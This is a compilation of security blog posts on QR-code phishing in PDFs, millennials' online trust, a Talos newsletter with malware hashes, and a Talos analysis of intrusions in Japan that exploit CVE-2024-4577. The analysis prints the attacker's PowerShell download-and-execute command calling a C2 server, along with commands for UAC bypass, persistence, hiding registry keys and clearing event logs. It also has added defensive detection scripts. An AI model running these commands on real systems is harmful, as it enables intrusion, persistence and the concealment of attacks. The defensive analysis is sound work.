Plus, in this case, less suspicion is raised by the prompt to enter work credentials, which are what the attackers basically want. On a computer, the user is likely to be signed in already, but accessing work systems from a personal device requires additional authentication, right?

The goal of most phishing schemes is to extract work credentials

Why are QR codes most often hidden in PDF files?

Sure, a QR code can also be sent in the body of an email. But hardly anyone will follow a QR code without a few words explaining why they should, and this text can be analyzed and flagged as phishing. Besides, an image has certain characteristics – at least its dimensions – by which it can be identified.

Phishing QR code in an image in the body of an email

A PDF file, on the other hand, is a kind of black box. Although the format is an open standard, its content is spread across objects and compressed streams, so you can’t peek inside without parsing it with special tools. In addition, the cover email can contain minimal text, something like: “Important! All information in the PDF”

Phishing email with a PDF file and minimal accompanying information

How does our technology work?

Of course, a QR code in an email isn’t always a sign of phishing. For example, mobile application developers often furnish their PDF documents and mailings with direct links to app stores. In general, it’s a quick and easy way to send a link to a phone. That’s why we can’t mark every email containing a QR code as suspicious. So our developers created a tool to extract URLs from QR codes for additional checking by anti-phishing modules and anti-spam heuristics.

Not only can the technology extract URLs from QR codes in images, but also check PDF files – extracting all links from all QR codes found inside them. If a link is recognized as phishing, the email is also flagged as phishing and processed in accordance with the Kaspersky Secure Mail Gateway settings. So the end user never even sees the dangerous QR code. The best outcome!
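The first step in the pipeline described above is pulling the image objects out of a PDF so that they can be handed to a QR decoder. The following Python is an added example, not Kaspersky’s code: it walks the PDF object table, finds XObjects with /Subtype /Image, and returns the decoded stream bytes (inflating FlateDecode; a DCTDecode stream is already a complete JPEG). The sample PDF is constructed inline; QR decoding itself is left to an external decoder (not included), and the parser assumes a classic, unencrypted PDF without object streams or PNG predictors.

```python
import re
import zlib

OBJ_HEADER = re.compile(rb"(\d+)\s+(\d+)\s+obj\b")


def iter_objects(pdf):
    """Yield (object number, body bytes) for every 'N G obj' in file order."""
    heads = list(OBJ_HEADER.finditer(pdf))
    for i, h in enumerate(heads):
        end = heads[i + 1].start() if i + 1 < len(heads) else len(pdf)
        yield int(h.group(1)), pdf[h.end():end]


def int_entry(dictionary, key):
    """Direct integer value of /key; None if absent or an indirect reference (N 0 R)."""
    m = re.search(rb"/" + key + rb"\s+(\d+)(\s+\d+\s+R)?", dictionary)
    if not m or m.group(2):
        return None
    return int(m.group(1))


def stream_bytes(body):
    """Raw stream payload of an object, or None if it has no stream."""
    m = re.search(rb"\bstream\r?\n", body)   # \b keeps this from matching 'endstream'
    if not m:
        return None
    start = m.end()
    length = int_entry(body[:m.start()], b"Length")
    if length is None:                        # indirect /Length: fall back to the endstream keyword
        end = body.find(b"endstream", start)
        return body[start:end].rstrip(b"\r\n")
    return body[start:start + length]


def extract_images(pdf):
    """Return image XObjects as dicts: obj, width, height, filter, decoded flag and bytes.
    FlateDecode is inflated; DCTDecode (JPEG) is returned as-is because the stream already
    is a complete JPEG file; other filters are returned raw with decoded=False."""
    images = []
    for num, body in iter_objects(pdf):
        m = re.search(rb"\bstream\r?\n", body)
        head = body[:m.start()] if m else body
        if not re.search(rb"/Subtype\s*/Image\b", head):
            continue
        raw = stream_bytes(body)
        if raw is None:
            continue
        f = re.search(rb"/Filter\s*/(\w+)", head)
        filt = f.group(1).decode() if f else None
        data = zlib.decompress(raw) if filt == "FlateDecode" else raw
        images.append({"obj": num, "width": int_entry(head, b"Width"),
                       "height": int_entry(head, b"Height"), "filter": filt,
                       "decoded": filt in (None, "FlateDecode", "DCTDecode"), "data": data})
    return images


def build_sample_pdf():
    """Constructed one-page PDF: a 21x21 grayscale checkerboard image XObject (FlateDecode)
    plus a Form XObject that must NOT be reported."""
    pixels = bytes((0 if (x + y) % 2 else 255) for y in range(21) for x in range(21))
    img = zlib.compress(pixels)
    objs = [
        b"<< /Type /Catalog /Pages 2 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] "
        b"/Resources << /XObject << /Im1 4 0 R /Fx1 5 0 R >> >> >>",
        b"<< /Type /XObject /Subtype /Image /Width 21 /Height 21 /ColorSpace /DeviceGray "
        b"/BitsPerComponent 8 /Filter /FlateDecode /Length %d >>\nstream\n" % len(img)
        + img + b"\nendstream",
        b"<< /Type /XObject /Subtype /Form /BBox [0 0 1 1] /Length 2 >>\nstream\nq\n\nendstream",
    ]
    out = b"%PDF-1.4\n"
    for i, o in enumerate(objs, 1):
        out += b"%d 0 obj\n" % i + o + b"\nendobj\n"
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    for image in extract_images(build_sample_pdf()):
        print({k: v for k, v in image.items() if k != "data"}, len(image["data"]), "bytes")
```

Each returned record is what a QR decoder needs (dimensions plus raw pixels, or a JPEG it can open itself); the decoded URLs then go through the same reputation and heuristic checks as a link in the message body. Real-world mail attachments also use object streams, PNG predictors and encryption, which a production extractor has to handle before this step.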

Kaspersky official blog – Read More

The digital illusion: millennials and online safety risks | Kaspersky official blog

Millennials have grown up alongside the rise of social media and digital communication – and in many ways appear to be the most tech-savvy generation. However, our latest research reveals a concerning reality: 70 percent of millennials rarely verify the authenticity of the people they engage with online, leaving them vulnerable to cyberrisks such as identity fraud, misinformation, and emotional deception.

As digital friendships and online communities become increasingly central to daily life, many millennials need to rethink their approach to online trust (actually, so do other generations, of course, but today we concentrate on the “millennial paradox”). The desire for connection and validation is driving significant behavioral shifts – from prioritizing social-media interactions over real-world relationships, to oversharing personal information in digital spaces. These trends expose users to heightened cybersecurity threats – making digital literacy and caution more important than ever.

The trust paradox: digital natives, yet still vulnerable to deception

Despite being the first generation to embrace the internet fully, many millennials place misplaced trust in their online interactions. While 64 percent have encountered someone misrepresenting their identity, nearly half still trust information shared within their digital communities. This contradiction highlights a gap between perceived digital expertise and actual cybersecurity awareness.

Digital paradox: millennials’ trust gap exposed

Cyber-psychologist Ruth Guest warns that this overconfidence can lead to risky behavior. “When we trust our own digital savvy implicitly, we may overlook the possibility that others are not as genuine as they appear. In some cases, individuals with strong narcissistic, psychopathic or Machiavellian traits exploit this trust through catfishing and other deceptive tactics.”

Rethinking digital trust means applying a level of skepticism that matches real-world caution. A strong cybersecurity mindset requires more than technical skills – it demands critical thinking and vigilance.

From social validation to privacy risks

Social media has become the go-to space for millennials to share major life updates – often before informing close friends or family. Our research shows that nearly half of millennials post significant personal news online before discussing it in person with anyone. The instant feedback from likes, comments, and shares can create a sense of validation – but it also comes with risks.

Forty-five percent of millennials are comfortable sharing personal or sensitive information online – a behavior that can increase their exposure to phishing scams, identity theft, and doxing. Cybercriminals use publicly available information to craft targeted attacks – exploiting personal details such as location check-ins, workplace updates, and relationship status.

Chronic oversharers: millennials risk privacy for connection

According to Marc Rivero, Lead Security Researcher at Kaspersky, “Oversharing personal information online can make individuals more vulnerable to identity theft, phishing attacks, and social engineering scams. Personal details shared online, such as location check-ins, relationship status, and daily routines, can be exploited for targeted scams or unauthorized surveillance.”

To mitigate these risks, it’s important to reconsider what’s shared, strengthen privacy settings, and remain cautious about how digital footprints are being used.

Digital friendships: a balance between connection and risk

As loneliness rises among young adults (among other generations), online friendships have become an essential part of social life. Our study found that 29 percent of millennials report that digital friendships positively impact their mental health. Online communities provide a sense of belonging, and allow users to connect with like-minded individuals across the world.

Digital escape: millennials seek solace in online communities

However, not all online interactions are positive. Ten percent of millennials report negative experiences from digital interaction. Even more concerning, 14 percent admit to creating fake profiles or using false identities themselves. These statistics highlight the prevalence of digital deception and the challenges of distinguishing between genuine and fabricated relationships.

Back to cyber-psychologist Ruth Guest, she emphasizes the importance of balance. “Digital spaces have evolved into safe and creative havens where millennials can explore, learn and connect with like-minded individuals. When used wisely and with proper safeguards, social media can be a tremendous asset to one’s mental health. It offers a platform for self-expression, a sense of belonging, and even creative inspiration. However, it is crucial to remember that the benefits of these online communities depend on maintaining a balance.”

How millennials can strengthen their digital defenses

As key players in the digital world, millennials need to take proactive steps to protect their online presence and encourage stronger cybersecurity habits in those around them. Implementing essential security measures can help reduce exposure to online threats and foster safer digital habits.

1. Verify identities

  • Use reverse-image searches, and cross-check profiles before engaging with new contacts.

2. Cross-check information

3. Protect personal information

  • Adjust social-media privacy settings, and use our online privacy checker to enhance security.
  • Be mindful of real-time location sharing to avoid tracking risks.

4. Respect others’ privacy

5. Stay educated regarding online scams

6. Use strong passwords and security tools

7. Keep devices updated and secure

  • Regularly update apps, software, and antivirus programs to prevent vulnerabilities being exploited.
  • Use Kaspersky Premium for real-time protection against identity theft, malicious links, and cyberthreats.

To access the full research report, visit the link.

Kaspersky official blog – Read More

Who is Responsible and Does it Matter?

Welcome to this week’s edition of the Threat Source newsletter.

At Talos we bat on behalf of our customers, protecting them against all manner of cyber threats that may affect them. The nature of the threat actor and their origin or affiliation makes no difference; if they are attacking or planning to attack a customer, we do our utmost to stop them.

In practice, identifying the origin of attacks can be surprisingly difficult, much harder than identifying the attack itself.  Attacks do not arrive wrapped in a flag with a certificate of origin. Typically, attackers seek to hide their origin so as to avoid the attention of law enforcement or the international community. However, although not an easy task, the attacker will often unwittingly leave clues to their identity.

We are all creatures of habit; we all have our preferred methods of doing things, tools that we are familiar with, or suppliers that we often choose over another. Threat actors are no different. Over time, the choices made by a threat actor in how they carry out their attacks, the methods they use, and their choice of victims builds to become a characteristic fingerprint.

New attacks can be analysed to identify if their characteristics overlap with those of a known threat actor. If so, we may surmise that the attack has been carried out by that threat actor. Nevertheless, uncovering and understanding the relationship between an attack and the threat actor behind the attack requires detailed research or possibly will only become apparent with the passage of time and the publication of additional information.

Even if an attack can be attributed to a known threat actor, the nature and origin of that threat actor may be obscure. Threat actors rarely admit to their actions and volunteer their identity. A detailed investigation by law enforcement or intelligence agencies may identify an attacker’s identity. Otherwise, the security industry refers to known threat actors by various pseudonyms, few of which are definitively tied to one or more named individuals or an organisation. Understanding and communicating degrees of uncertainty when it comes to describing threat actors is a key skill in the threat intelligence community.

Suffice to say that we do not pick and choose the threats that we block. We block them regardless of their origin because this is who we are and what we do, and in any case, identifying the origin of a threat is not a simple matter.

The one big thing

Lotus Blossom is a sophisticated threat actor that we’ve uncovered conducting espionage campaigns against the government, manufacturing, telecoms, and media sectors in Vietnam, Hong Kong, Taiwan, and the Philippines. As part of this activity, the threat actor uses the Sagerunex family of backdoor malware for command and control activity.

Why do I care?

Understanding how threat actors such as Lotus Blossom conduct their operations helps inform organisations about the defenses that are required to protect against this and similar threats. Even if you are not working within one of the affected industry sectors, other threat actors may be conducting information-stealing campaigns against you.

So now what?

Use the IOCs associated with the campaign to search for evidence of incursion within your own organization. Use this exercise as a means of verifying that you have visibility of the systems on your network and that you are able to search for known malicious IOCs.

Top security headlines of the week

244 million additional compromised passwords from a data dump offered for sale by criminals have been added to the privacy breach notification service “Have I Been Pwned”. (The Register)

A massive botnet consisting of more than 86 000 compromised IoT devices is conducting DDoS attacks against telecom firms and gaming platforms. (Cybersecurity Dive)

The US agency CISA reports that it will continue to defend against threats, including those from Russia. (TheRecord)

Can’t get enough Talos?

In The Talos Threat Perspective episode 9, Hazel Burton speaks with Nick Biasini about changes in social engineering techniques.

Upcoming events where you can find Talos

RSA (April 28-May 1, 2025)  San Francisco, CA  
CTA TIPS 2025 (May 14-15, 2025) Arlington, VA 
Cisco Live U.S. (June 8 – 12, 2025) San Diego, CA 

Most prevalent malware files from Talos telemetry over the past week

SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca 
MD5: 71fea034b422e4a17ebb06022532fdde 
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details 
Typical Filename: VID001.exe 
Claimed Product: N/A 
Detection Name: Coinminer:MBT.26mw.in14.Talos 

SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
Typical Filename: VID001.exe  
Detection Name: Simple_Custom_Detection

SHA256: 592835f805da0d9a24a5d91a0f77ad9988853da34a97b50e75e77c72573edeac
MD5: 6361f25ede0442f2e0ad3bcd33c331c8
Typical Filename: KMSSS.exe
Detection Name: PUA.Win.Dropper.Hackkms::tpd
VirusTotal: https://www.virustotal.com/gui/file/592835f805da0d9a24a5d91a0f77ad9988853da34a97b50e75e77c72573edeac

SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Typical Filename: img001.exe
Detection Name: Win.Trojan.Miner-9835871-0
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91

Cisco Talos Blog – Read More

Unmasking the new persistent attacks on Japan

  • Cisco Talos discovered malicious activities conducted by an unknown attacker since as early as January 2025, predominantly targeting organizations in Japan.  
  • The attacker has exploited the vulnerability CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation of PHP on Windows, to gain initial access to victim machines.  
  • The attacker utilizes plugins of the publicly available Cobalt Strike kit “TaoWu” for post-exploitation activities. 
  • Talos found a pre-configured installer script on the command and control (C2) server that deploys a full suite of adversarial tools and frameworks hosted on an Alibaba cloud container Registry, highlighting the potential misuse of such tools for malicious purposes by the attacker. 
  • Talos noticed the attacker’s attempt at stealing the victim’s machine credentials. However, we assess with moderate confidence that the attacker’s motive extends beyond just credential harvesting, based on our observation of other post-exploitation activities, such as establishing persistence, elevating to SYSTEM level privilege, and potential access to adversarial frameworks, indicating the likelihood of future attacks. 
  • We reported an increasing trend of threat actors exploiting vulnerable public facing applications for initial access in our quarterly Talos Incident Response (Talos IR) report for Q4 2024, and the discovery of this intrusion highlights this ongoing activity.  

Victimology  

We found that the attacker predominantly targets organizations in Japan across various business verticals, including technology, telecommunications, entertainment, education, and e-commerce, based on our analysis of command and control (C2) server artefacts.  

Attack overview  

The attacker attempts to compromise the victim machine using an exploit program targeting the vulnerability CVE-2024-4577, a remote code execution (RCE) flaw in the PHP-CGI implementation of PHP on Windows. In the event of successful exploitation, the attacker executes PowerShell script to run Cobalt Strike reverse HTTP shellcode, ensuring remote access to the victim machine.  

Then, they begin reconnaissance by gathering system details and user privileges. They execute privilege escalation exploit programs, such as JuicyPotato, RottenPotato, and SweetPotato, to gain SYSTEM-level access. They establish persistence by modifying registry keys, adding scheduled tasks, and creating malicious services using the plugins of the Cobalt Strike kit called “TaoWu.”  

To maintain stealth, they erase event logs using wevtutil commands, removing traces of their actions from the Windows security, system, and application logs. They further perform network reconnaissance using “fscan.exe” and “Seatbelt.exe” to map out potential lateral movement targets. The attacker has also attempted to abuse Group Policy Objects using “SharpGPOAbuse.exe” to execute malicious PowerShell scripts across the network. Eventually, they execute Mimikatz commands to dump and exfiltrate passwords and NTLM hashes from memory on the victim’s machine.  

Initial access 

Talos discovered that the attacker gains initial access to the victim’s network by exploiting the vulnerability CVE-2024-4577.  

CVE-2024-4577 is a critical remote code execution (RCE) vulnerability in Windows-based PHP installations using CGI configurations. It arises from the “Best-Fit” behavior in Windows code pages, where certain characters are replaced in command-line inputs. The flaw in the PHP-CGI module misinterprets these characters as PHP options, allowing attackers to execute arbitrary PHP code on the server when using Apache with a vulnerable PHP-CGI setup.  

To target the vulnerability, the attacker leverages a publicly available exploit Python script, “PHP-CGI_CVE-2024-4577_RCE.py”. The script checks whether a specific URL is vulnerable to CVE-2024-4577 by sending a specially crafted POST request to the target URL with PHP code designed to trigger the vulnerability. If the response contains the MD5 hash “e10adc3949ba59abbe56e057f20f883e”, exploitation succeeded. The exploit script then prompts the user for commands, as PHP code, that are executed on the vulnerable server, and displays the responses to the attacker.  

Snippet of the CVE-2024-4577 exploit script.

In this intrusion, we found that the attacker has executed an embedded PowerShell command in the PHP code to trigger the infection.  

<?php system ('powershell -c "Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http[://]38[.]14[.]255[.]23[:]8000/payload[.]ps1')"');?>

The attacker triggers the infection by executing the PowerShell command through the PHP code, which downloads a PowerShell injector script from the C2 server and executes it in the victim machine’s memory.  

The PowerShell injector script is embedded with either a base64-encoded or a hexadecimal data blob of the Cobalt Strike reverse HTTP shellcode. Upon execution, it injects and executes the shellcode in the victim machine’s memory; the shellcode connects to the Cobalt Strike team server on the C2 server over HTTP, enabling remote access to the victim machine.  

Sample PowerShell injector script.

The shellcode connects to the C2 server 38[.]14[.]255[.]23 over HTTP on port 8077, using the URL paths “/6Qeq” or “/jANd”. The attacker has used one of the following two User-Agent headers.  

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; LEN2)
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; BOIE9; ENUS)
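
As an added example (not code from Talos or the post), the following Python hunts proxy log lines for the beacon indicators just listed: the C2 address and port, the two URI paths, and the two User-Agent strings. The combined-style proxy log layout with absolute URLs is an assumption about the log source, and the sample lines are constructed.

```python
"""Hunt proxy logs for the Cobalt Strike beacon indicators quoted above.

Added example, not Talos code. The C2 address, port, URI paths and
User-Agent strings are the ones in the write-up (re-fanged so they compare
as real values); the log lines are constructed in an Apache combined-style
proxy format, which is an assumption about the log source.
"""
import re
from dataclasses import dataclass

C2_HOST = "38.14.255.23"
C2_PORT = 8077
BEACON_PATHS = {"/6Qeq", "/jANd"}
BEACON_USER_AGENTS = {
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; LEN2)",
    "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; BOIE9; ENUS)",
}

# client ident user [time] "METHOD absolute-url HTTP/x" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
URL_RE = re.compile(r'^https?://(?P<host>[^/:]+)(?::(?P<port>\d+))?(?P<path>/[^?\s]*)')


@dataclass
class Hit:
    client: str
    time: str
    reasons: tuple


def check_line(line):
    """Return a Hit when the request matches any beacon indicator, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    u = URL_RE.match(m["url"])
    if not u:
        return None
    reasons = []
    port = int(u["port"]) if u["port"] else 80
    if u["host"] == C2_HOST and port == C2_PORT:
        reasons.append("c2-host")
    if u["path"] in BEACON_PATHS:        # weakest signal on its own: short random paths
        reasons.append("beacon-uri")
    if m["ua"] in BEACON_USER_AGENTS:    # exact match against the strings seen in this intrusion
        reasons.append("beacon-user-agent")
    return Hit(m["client"], m["time"], tuple(reasons)) if reasons else None


def hunt(lines):
    """Run check_line over an iterable of log lines and keep the hits, in order."""
    hits = []
    for line in lines:
        hit = check_line(line)
        if hit:
            hits.append(hit)
    return hits


# Constructed sample: one beacon check-in, one normal browse, one UA/path-only match.
SAMPLE_LOG = [
    '10.0.0.21 - - [05/Mar/2025:10:01:02 +0900] "GET http://38.14.255.23:8077/6Qeq HTTP/1.1" 200 312 "-" '
    '"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; LEN2)"',
    '10.0.0.22 - - [05/Mar/2025:10:01:05 +0900] "GET http://www.example.com/index.html HTTP/1.1" 200 5120 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/128.0"',
    '10.0.0.23 - - [05/Mar/2025:10:02:11 +0900] "POST http://cdn.example.net/jANd HTTP/1.1" 200 88 "-" '
    '"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; BOIE9; ENUS)"',
]

if __name__ == "__main__":
    for h in hunt(SAMPLE_LOG):
        print(h.client, h.time, ", ".join(h.reasons))
```

A host-and-port match is the strongest signal; a path match alone (“/6Qeq” is four characters) will produce false positives, which is why the reasons are returned as a tuple so an analyst can weight hits rather than treat them all the same.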

Snippet of the Cobalt Strike reverse HTTP shellcode.

Post-exploitation activities 

After gaining remote access to the victim machine through Cobalt Strike reverse HTTP shellcode, the attacker remotely executes commands on the victim machine from the Cobalt Strike server that is configured with plugins from the “TaoWu” Cobalt Strike kit (hxxps[://]github[.]com/pandasec888/taowu-cobalt_strike) to perform the post-exploitation tasks. 

Below are the post-exploitation commands that we observed in this attack that relate to the MITRE ATT&CK framework. 

Reconnaissance  

ATT&CK Technique: System Owner/User Discovery (T1033) 

The attacker gathers the victim’s system and user information and also checks the time synchronization by remotely executing the following commands on the victim machine.  

whoami /all 
dir 
net time 

Privilege escalation

ATT&CK Technique: Exploitation for Privilege Escalation (T1068) 

The attacker attempts to elevate the user privileges by executing privilege escalation exploits, including JuicyPotato, RottenPotato, and SweetPotato. These Potato exploits abuse the Windows method of handling authentication and impersonation tokens to escalate privileges from a low-privileged user to SYSTEM user.   

Microsoft has already patched the flaws that these exploits target in Windows 10 and Windows Server 2012, 2016, and 2019, as well as in the latest versions. However, if a Windows process has “SeImpersonatePrivilege” permission enabled that allows a process to impersonate another user’s security token, it could still be abused for privilege escalation using JuicyPotato, SweetPotato, and RottenPotato.  

The attacker uses Ladon[.]exe, a plugin of the “TaoWu” Cobalt Strike kit, to bypass User Account Control (UAC) on the victim machine.  

Ladon.exe BypassUac C:\Windows\Temp\123.exe 

Persistence 

ATT&CK Technique: Modify Registry (T1112) 

ATT&CK Technique: Scheduled task/job (T1053)  

ATT&CK Technique: Create or Modify System Process (T1543)  

The attacker leverages the “reg add” command and other .NET plugins of the TaoWu Cobalt Strike kit to modify the registry keys and create the Windows scheduled tasks to establish persistence on the victim machine. 

The attacker executes the “reg add” command to add the path of the beacon executable to the Run registry key. 

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Svchost /t REG_SZ /d "C:\Windows\system32\cmd.exe" /f C:\Windows\Temp\payload.exe 

The attacker runs “sharpTask.exe”, a .NET program used to schedule a task on the Windows machine. 

sharpTask.exe --AddTask Computer|local|hostname|ip 24h:time|12:30  some Service "Some Service" C:\Windows\Temp\payload.exe 

They run “SharpHide.exe”, the utility used to create a hidden registry key.  

SharpHide.exe action=create keyvalue="C:\Windows\Temp\123.exe" 

They also run “SharpStay.exe”, a .NET tool used to create a service in the Windows machine.  

SharpStay.exe action=CreateService servicename=Debug command="C:\Windows\tmp\payload.exe" 
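
An added example, not Talos code, of how a defender can triage the autostart locations touched above (Run values, scheduled tasks, services) for the traits these commands share: payloads staged under C:\Windows\Temp or C:\Windows\tmp, a Run value named after a Windows component that does not point at the real binary, and a cmd.exe wrapper placed in front of the payload. The Autostart record shape and the sample entries are constructed; the hidden-key check assumes that hidden registry values, as SharpHide creates them, carry a name with a leading control character that regedit cannot display.

```python
"""Triage autostart entries for the persistence patterns described above.

Added example, not Talos code. Input is a constructed list of autostart
records (Run values, scheduled-task actions, service ImagePaths) in the
shape an EDR export or collection script might produce; the flagged
locations and names follow the commands in the write-up.
"""
import re
from dataclasses import dataclass, field

# Directories a legitimate autostart binary should not live in (lower-case substrings).
STAGING_DIRS = ("c:\\windows\\temp\\", "c:\\windows\\tmp\\", "\\appdata\\local\\temp\\", "c:\\users\\public\\")
# Windows components whose names attackers reuse for their own entries (all live in System32).
WINDOWS_COMPONENT_NAMES = {"svchost", "lsass", "csrss", "winlogon"}
EXE_RE = re.compile(r'[a-z]:\\[^\s"]+\.(?:exe|dll|ps1|bat|cmd)', re.IGNORECASE)


@dataclass
class Autostart:
    kind: str      # "run_value", "scheduled_task" or "service"
    name: str      # value name, task name or service name
    command: str   # command line, task action or ImagePath


@dataclass
class Finding:
    entry: Autostart
    reasons: list = field(default_factory=list)


def executables_in(command):
    """All Windows executable paths mentioned in a command string, lower-cased."""
    return [p.lower() for p in EXE_RE.findall(command)]


def triage(entries):
    """Return a Finding for every entry that shows at least one suspicious trait."""
    findings = []
    for e in entries:
        reasons = []
        exes = executables_in(e.command)
        for path in exes:
            if any(d in path for d in STAGING_DIRS):
                reasons.append(f"binary in staging directory: {path}")
        # "cmd.exe <other.exe>" makes the value look like a system binary while the
        # real payload trails it (the observed Svchost Run value has this shape).
        if len(exes) >= 2 and exes[0].endswith("\\cmd.exe"):
            reasons.append("cmd.exe wrapper around another executable")
        lname = e.name.lower()
        if lname in WINDOWS_COMPONENT_NAMES and not any(
            p == f"c:\\windows\\system32\\{lname}.exe" for p in exes
        ):
            reasons.append("name imitates a Windows component")
        # Assumption: hidden registry values (as created by tools such as SharpHide)
        # carry a name regedit cannot render; a control character in the name is the tell.
        if any(ord(c) < 32 for c in e.name):
            reasons.append("name contains control characters (hidden registry key)")
        if reasons:
            findings.append(Finding(e, reasons))
    return findings


# Constructed sample entries: four modelled on the observed commands, two benign.
SAMPLE_ENTRIES = [
    Autostart("run_value", "Svchost", '"C:\\Windows\\system32\\cmd.exe" C:\\Windows\\Temp\\payload.exe'),
    Autostart("scheduled_task", "Some Service", "C:\\Windows\\Temp\\payload.exe"),
    Autostart("service", "Debug", "C:\\Windows\\tmp\\payload.exe"),
    Autostart("run_value", "\x00Updater", "C:\\Windows\\Temp\\123.exe"),
    Autostart("run_value", "OneDrive", '"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background'),
    Autostart("service", "Spooler", "C:\\Windows\\System32\\spoolsv.exe"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_ENTRIES):
        print(f.entry.kind, repr(f.entry.name), "->", "; ".join(f.reasons))
```

The checks are deliberately path- and name-based so they work on an offline export; signature status and file hashes, which an EDR would add, are the natural next filters.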

Detection evasion

ATT&CK Technique: Indicator Removal on Host: Clear Windows Event Logs (T1070.001) 

The attacker erases evidence of their activity on the victim machine by clearing the Windows event logs on the compromised endpoint using the living-off-the-land binary (LoLBin) “wevtutil.exe”.  

wevtutil cl security 
wevtutil cl system 
wevtutil cl application 
wevtutil cl windows powershell 
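
As an added example (not Talos code), the detection below shows where log clearing still leaves a trace: the Security log records Event ID 1102 when it is cleared, the System log records Event ID 104 for the other logs, and a process-creation record (Security 4688 or Sysmon Event 1) captures the wevtutil command line itself, provided the records are forwarded before they are wiped. The one-JSON-object-per-line export format and the sample events are constructed.

```python
"""Detect event-log clearing from the records that survive it.

Added example, not Talos code. Clearing a Windows log is itself recorded:
the Security log writes EventID 1102 ("The audit log was cleared") and the
System log writes EventID 104 when another log is cleared, so those events,
a forwarded copy of the logs, or a process-creation record showing
"wevtutil cl" are where the activity above leaves a trace. Events below are
constructed in a simplified one-JSON-object-per-line form (an assumption
about how the collector exports them).
"""
import json
import re

SYSMON_CHANNEL = "Microsoft-Windows-Sysmon/Operational"
WEVTUTIL_CLEAR_RE = re.compile(r'\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\b', re.IGNORECASE)


def classify(event):
    """Map one parsed event to a finding dict, or None when it is benign."""
    channel, eid = event.get("Channel"), event.get("EventID")
    host, user = event.get("Computer"), event.get("SubjectUserName")
    if channel == "Security" and eid == 1102:
        return {"type": "security-log-cleared", "host": host, "user": user}
    if channel == "System" and eid == 104:
        # "LogName" is the simplified export field for the cleared log (constructed name)
        return {"type": "log-cleared", "host": host, "user": user, "log": event.get("LogName")}
    is_proc_create = (channel == "Security" and eid == 4688) or (channel == SYSMON_CHANNEL and eid == 1)
    if is_proc_create:
        cmd = event.get("CommandLine", "")
        if WEVTUTIL_CLEAR_RE.search(cmd):
            return {"type": "wevtutil-clear-command", "host": host, "user": user, "command": cmd}
    return None


def detect(raw_lines):
    """Parse each JSON line and collect findings; corrupt lines are skipped, not fatal."""
    findings = []
    for line in raw_lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        finding = classify(event)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample export: three traces of clearing, two benign records, one truncated line.
SAMPLE_EVENTS = [
    json.dumps({"Channel": "Security", "EventID": 4688, "Computer": "WS01", "SubjectUserName": "svc_web",
                "CommandLine": "wevtutil cl security"}),
    json.dumps({"Channel": "Security", "EventID": 1102, "Computer": "WS01", "SubjectUserName": "svc_web"}),
    json.dumps({"Channel": "System", "EventID": 104, "Computer": "WS01", "SubjectUserName": "svc_web",
                "LogName": "Application"}),
    json.dumps({"Channel": "Security", "EventID": 4688, "Computer": "WS01", "SubjectUserName": "alice",
                "CommandLine": "notepad.exe notes.txt"}),
    json.dumps({"Channel": "Security", "EventID": 4688, "Computer": "WS01", "SubjectUserName": "alice",
                "CommandLine": "wevtutil qe Security /c:5"}),   # querying, not clearing
    '{"Channel": "System", "EventID": 104, "Computer": "WS0',    # truncated record
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f)
```

The 1102 and 104 records are written into the log that was just cleared, so on the endpoint they are often the only entries left; a forwarder or SIEM that received the earlier 4688/Sysmon record keeps the command line that shows who ran the clear.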

Lateral movement  

ATT&CK Technique: Lateral Tool Transfer (T1570) 

The attacker uses fscan.exe, an open-source network scanning utility, and Seatbelt, a tool that collects detailed information about a system (such as remote access configurations, network shares, and other security-relevant data) on the victim machine, to perform network reconnaissance and lateral movement in the victim network.  

The attacker uploads the utility “fscan.exe” from the C2 server to the “C:\Windows\Temp” directory on the victim machine. 

upload /"C2 server path"/fscan.exe 

The attacker runs the .NET program “Seatbelt.exe” to gather the remote access-related information of the victim machine. 

Seatbelt.exe -group=Remote -full 

The attacker runs “SharpGPOAbuse.exe”, a tool used to abuse group policy objects (GPOs) for malicious purposes. The attacker creates a scheduled task via GPO named “update” that runs a PowerShell command across the network, which downloads and executes the attacker’s PowerShell payload. 

